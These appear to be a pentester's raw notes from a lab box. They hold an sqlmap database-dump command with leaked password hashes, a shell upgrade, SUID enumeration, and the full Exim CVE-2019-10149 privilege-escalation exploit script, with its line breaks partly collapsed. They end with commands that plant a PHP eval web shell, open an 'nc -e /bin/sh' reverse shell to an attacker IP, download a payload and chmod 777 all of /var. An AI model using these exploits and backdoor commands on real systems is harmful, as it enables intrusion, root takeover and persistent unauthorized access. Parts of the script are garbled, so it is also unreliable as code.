sqlmap -u http://192.168.206.142/?nid=1 -D d7db --tables

name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

python -c 'import pty;pty.spawn("/bin/bash")'
find / -user root -perm -4000 -print 2>/dev/null

/usr/sbin/exim4 --version

#!/bin/bash#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'# usage instructions
function usage()
{echo "$0 [-m METHOD]"echoecho "-m setuid : use the setuid payload (default)"echo "-m netcat : use the netcat payload"echoexit 1
}# payload delivery
function exploit()
{# connect to localhost:25exec 3<>/dev/tcp/localhost/25# deliver the payloadread -u 3 && echo $REPLYecho "helo localhost" >&3read -u 3 && echo $REPLYecho "mail from:<>" >&3read -u 3 && echo $REPLYecho "rcpt to:<$PAYLOAD>" >&3read -u 3 && echo $REPLYecho "data" >&3read -u 3 && echo $REPLYfor i in {1..31}doecho "Received: $i" >&3doneecho "." >&3read -u 3 && echo $REPLYecho "quit" >&3read -u 3 && echo $REPLY
}# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo# parse command line
while [ ! -z "$1" ]; docase $1 in-m) shift; METHOD="$1"; shift;;* ) usage;;esac
done
if [ -z $METHOD ]; thenusage
fi# setuid method
if [ $METHOD = "setuid" ]; then# prepare a setuid shell helper to circumvent bash checksecho "Preparing setuid shell helper..."echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.cgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/nullif [ $? -ne 0 ]; thenecho "Problems compiling setuid shell helper, check your gcc."echo "Falling back to the /bin/sh method."cp /bin/sh /tmp/pwnedfiecho# select and deliver the payloadecho "Delivering $METHOD payload..."PAYLOAD=$PAYLOAD_SETUIDexploitecho# wait for the magic to happen and spawn our shellecho "Waiting 5 seconds..."sleep 5ls -l /tmp/pwned/tmp/pwned# netcat method
elif [ $METHOD = "netcat" ]; then# select and deliver the payloadecho "Delivering $METHOD payload..."PAYLOAD=$PAYLOAD_NETCATexploitecho# wait for the magic to happen and spawn our shellecho "Waiting 5 seconds..."sleep 5nc -v 127.0.0.1 31337# print help
elseusage
fi

#!/bin/bash
cd /var/www/html/
touch muma2.php
echo '<?php eval($_POST[1]);?>' >> /var/www/html/muma2.php

nc -e /bin/sh 192.168.206.128 10010
wget http://192.168.206.128:8000/miansha.php
chmod 777 ./miansha.php
chmod -R 777 /var/*